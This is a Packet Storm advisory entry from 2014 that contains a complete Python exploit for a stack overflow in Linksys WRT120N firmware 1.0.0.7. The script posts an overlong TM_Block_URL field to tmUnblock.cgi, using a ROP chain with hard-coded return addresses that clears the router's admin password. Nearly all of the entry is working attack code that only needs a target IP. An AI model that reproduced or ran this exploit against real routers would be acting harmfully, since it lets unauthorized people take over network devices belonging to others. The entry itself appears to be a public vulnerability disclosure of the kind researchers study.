WRT120N 1.0.0.7 Stack Overflow

2014-02-20T00:00:00
ID PACKETSTORM:125306
Type packetstorm
Reporter Craig Heffner
Modified 2014-02-20T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#  
# WRT120N v1.0.0.7 stack overflow, ROP to 4-byte overwrite which clears the admin password.  
#  
# Craig Heffner  
# http://www.devttys0.com  
# 2014-02-14  
  
import sys  
import urllib2  
  
try:  
target = sys.argv[1]  
except IndexError:  
print "Usage: %s <target ip>" % sys.argv[0]  
sys.exit(1)  
  
url = target + '/cgi-bin/tmUnblock.cgi'  
if '://' not in url:  
url = 'http://' + url  
  
post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="  
post_data += "B" * 246 # Filler  
post_data += "\x81\x54\x4A\xF0" # $s0, address of admin password in memory  
post_data += "\x80\x31\xF6\x34" # $ra  
post_data += "C" * 0x28 # Stack filler  
post_data += "D" * 4 # ROP 1 $s0, don't care  
post_data += "\x80\x34\x71\xB8" # ROP 1 $ra (address of ROP 2)  
post_data += "E" * 8 # Stack filler  
  
for i in range(0, 4):  
post_data += "F" * 4 # ROP 2 $s0, don't care  
post_data += "G" * 4 # ROP 2 $s1, don't care  
post_data += "\x80\x34\x71\xB8" # ROP 2 $ra (address of itself)  
post_data += "H" * (4-(3*(i/3))) # Stack filler; needs to be 4 bytes except for the  
# last stack frame where it needs to be 1 byte (to  
# account for the trailing "\n\n" and terminating  
# NULL byte)  
  
try:  
req = urllib2.Request(url, post_data)  
res = urllib2.urlopen(req)  
except urllib2.HTTPError as e:  
if e.code == 500:  
print "OK"  
else:  
print "Received unexpected server response:", str(e)  
except KeyboardInterrupt:  
pass  
  
`